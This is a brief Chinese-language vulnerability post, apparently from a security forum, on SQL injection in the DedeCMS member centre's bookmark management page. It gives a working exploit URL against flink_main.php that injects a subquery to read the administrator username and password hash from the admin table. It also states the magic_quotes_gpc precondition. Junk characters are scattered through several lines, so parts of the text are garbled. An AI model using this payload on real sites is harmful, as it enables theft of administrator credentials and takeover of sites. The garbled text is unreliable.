DedeCMS会员中心SQL注射漏洞
$ ?, |! G& Z) L% \- v6 ]' }需要magic_quotes_gpc = Off# b$ M$ f$ P) Y4 t2 w% ^. L+ B, E
会员登录后可以执行SQL语句查询数据库任意内容如管理员密码.- V+ \- Q( j% W4 x& I* B+ N1 p! h
. y5 v$ n) w% I0 W' Z
DedeCMS会员中心书签管理SQL注射漏洞
* w, T, O1 d( q1 R; H$ _- {成功利用该漏洞可获得管理员密码; Y6 u r! h& u: b
' \, N2 j8 F' A( t7 {! S" R# t# w会员登录后可以执行SQL语句查询数据库任意内容如管理员密码6 G8 `$ S0 p; m$ @+ R$ T4 `7 {
: H! y% F( l+ F
http://bt/member/flink_main.php?dopost=update&aid=1&title=c4rp3nt3r&url=http://www.0x50sec.org',title=@`'`,url=(select concat(userid,0x3a,pwd) from `%23@__admin` limit 1),title='c4rp3nt3r m/ F& U+ Y' L. y# P- v+ r/ C
|